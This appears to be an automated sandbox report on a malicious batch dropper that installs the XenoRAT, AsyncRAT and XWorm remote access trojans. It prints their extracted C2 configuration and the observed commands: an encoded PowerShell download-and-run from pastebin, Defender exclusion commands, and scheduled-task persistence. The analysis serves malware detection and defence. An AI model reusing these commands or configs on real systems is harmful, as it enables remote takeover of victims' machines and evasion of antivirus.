Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
08-12-2024 12:54
General
-
Target
LHVWN_virus_src.bat
-
Size
680B
-
MD5
28a24f08a62dc5c8af6be5e921d4c5ad
-
SHA1
97f70c14a8e2ba4da9d8f5d65961d7d998ebb637
-
SHA256
c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559
-
SHA512
e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577
Malware Config
Extracted
xenorat
82.13.154.169
09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5
-
delay
5000
-
install_path
appdata
-
port
4444
-
startup_name
svchost
Extracted
asyncrat
CompPkgSrv
82.13.154.169:4444
-
delay
3
-
install
true
-
install_file
CompPkgSrv.exe
-
install_folder
%AppData%
Extracted
xworm
82.13.154.169:4444
-
Install_directory
%AppData%
-
install_file
CompPkgSup.exe
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Detect XenoRat Payload 3 IoCs
-
Detect Xworm Payload 2 IoCs
-
XenorRat
XenorRat is a remote access trojan written in C#.
-
Xenorat family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 7 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 2 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps15⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE6A7.tmp" /F8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /query /v /fo csv8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /delete /tn "\svchost" /f8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 39⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\CompPkgSrv.exe"C:\Users\Admin\AppData\Local\CompPkgSrv.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE484.tmp.bat""7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "CompPkgSrv"9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "CompPkgSrv"10⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB8A8.tmp.bat""9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 310⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\CompPkgSup.exe"C:\Users\Admin\AppData\Local\CompPkgSup.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"7⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\CompPkgSup.exeC:\Users\Admin\AppData\Roaming\CompPkgSup.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\CompPkgSup.exeC:\Users\Admin\AppData\Roaming\CompPkgSup.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD5a2cc522bd3b0806748349c386d613b00
SHA136f14471d1e307eec0af563f5c884acbffe65284
SHA256a68a6d746ffbaf79d5e43b140217f521d68efa0191f9630258c57faf9591b70d
SHA512c5f108ecc7ef45b465f07f3441ad00682a9ef9caa25783af1acf00777e087e483071e323b311581ed94c3cbbf740b776a13f29374ef5c42f795e36a13c36c959
-
Filesize
80KB
MD582ae01d348fce7ddf9f19ca5cb545ae1
SHA15b563cec5b49c7ec4082bf19aeccce9fc190bd2a
SHA2564a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d
SHA5126a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea
-
Filesize
871B
MD5d58f949aad7df2e7b55248bfdfc6e1b8
SHA16713cad396b5808b66ede2dd9b169e00d5e5018f
SHA2565e1611e4d915fd9759825811fa4463f09172889f85889a2942be1561948fab8a
SHA512bdddb838108c4f3f0a7737703cbde935fe26aaea97459bb099c4c773c0789997283d7f20ac7ea4ac2aedef23515afc0b251b5b461aa12d3b7a60846b87b26e38
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
944B
MD58e4e462e64126355db69af06ba8f774e
SHA1279d1d08ad530bf8a249366c5d927e1533f77f1a
SHA256c263a08e8768e9038dc462db8782f66ce94230ce8a372d7320e8eb7f862a3f76
SHA51292bd1d207d3f9d139e949e47f70d69ef1be8d40c11b03fd2bebb22bfeb598b6065921a1f3ec931e8a4d4dfdb8974a8405f17a1b3f54e4fc549fd8ea1dd5fb353
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
944B
MD50256bd284691ed0fc502ef3c8a7e58dc
SHA1dcdf69dc8ca8bf068f65d20ef1563bbe283e2413
SHA256e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf
SHA512c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
1KB
MD594af78d295fb3dfe76397aa481c33845
SHA1314f4100021ba93a64dd62fcb895d4d50b93af12
SHA256328b9f28515a4c00fcf1f8432a0a965fcf5866b0bd7abbafd5a17c3e10802f61
SHA5123f95a9ad4a4e8b923872fad42df64ba085f1ae95baedfb9dca857a6eb56ea9dd37437535d5efd6e778ac2ebdd26e963c2fc03969309d8bc2546f8eb2c949797a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
159B
MD50cfc79eed7546fb5583048a36f0ad811
SHA1c739dd3e95b483bd90cf70aba96b1e7ba9a6db08
SHA2561ff012cee193094f2a8e80f3246322e4adb763c0622fef8be704bf00d0aa9110
SHA5122b61aa8ada28ada407f571a90af0ddef321b6150c1c03a81519712fe7d27d74f67fe0e9b1f63531d4474dfa7653730d85ddaf6e5467e30c39a1bb747969adbd5
-
Filesize
154B
MD5b389f9115339ba0941119c025fa1e403
SHA15a68672a9dfa133211c4cb2b131a2ea91494721b
SHA2563b2a08de3611b1cc18ab41a4baa295279c5d087c29331d5f7c9b1b645775b7a7
SHA5126532fd9aec6468c792c4b0e42fa5b852e59034144b7dd8301cd3ee721ef199662fcdb3bce1dbea763eb70ae7f0ad90d621e974162af5bbeccf7e43aa0e673be0
-
Filesize
1KB
MD59cb9f8ba5ba99c36d5ba7ee5a98f0bd9
SHA14bb53c5f5d4f208a4082b59b0c4b5185866cd874
SHA256dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c
SHA512eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76
-
Filesize
46KB
MD531ee6e006c02625385210da20ce4b522
SHA1e13ae10bd9300fd4608f8fc697e789b9712c1a75
SHA25635edd93f3f9f6e21c6d88e50e475960290dacbba2c8d19cb74bb1b85fde24c2c
SHA51246aca18f2af78401b3d39c28b2d87de4d44c7661bbc4a129f0af840075ad2e2becf4d144fc98292efb909763543c64a4801f921c1b71232ac2cc4911224c77e4
-
Filesize
1KB
MD581f7df2e0aa206d331d8987c1035cef1
SHA151e8454a79b2f8127d96663c6a74f88b1f139f2a
SHA2564d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a
SHA5126defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d
-
Filesize
72KB
-
Filesize
408KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
7.6MB
-
Filesize
2.1MB
-
Filesize
10.8MB
-
Filesize
208KB
-
Filesize
120KB
-
Filesize
712KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
88KB
-
Filesize
272KB
-
Filesize
472KB